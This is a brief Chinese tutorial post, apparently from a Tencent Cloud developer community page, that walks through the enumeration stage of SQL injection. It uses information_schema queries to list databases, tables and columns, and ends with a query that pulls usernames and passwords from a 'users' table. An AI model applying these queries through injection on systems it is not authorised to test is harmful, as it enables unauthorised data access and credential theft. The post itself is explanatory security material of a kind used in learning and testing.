SQL注入爆破字段过程
原创
在明确了SQL注入的类型和过滤字段之后,要开始爆破所需要得到的内容,一下是关于爆破阶段的一些过程,可以根据实际过滤的字段调整部分SQL语句。
爆库名
爆数据库的库名借助information_schema数据库,该库中存储了大量关于数据库、表、列的信息。
爆库名的例子
select group_concat(schema_name) from information_schema.schemata;
爆表名
在确定要爆的数据库名称之后,可以继续爆表名。爆表名的例子:
select table_name from information_schema.tables where table_schema='mpsys';
爆列名
如果知道了数据库名和表名,可以继续爆列名:
select column_name from information_schema.columns where table_name='users' and table_schema='mpsys';
爆内容
在万事俱备之后,就可以爆内容了。
select username,password from mpsys.users;
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
腾讯云开发者
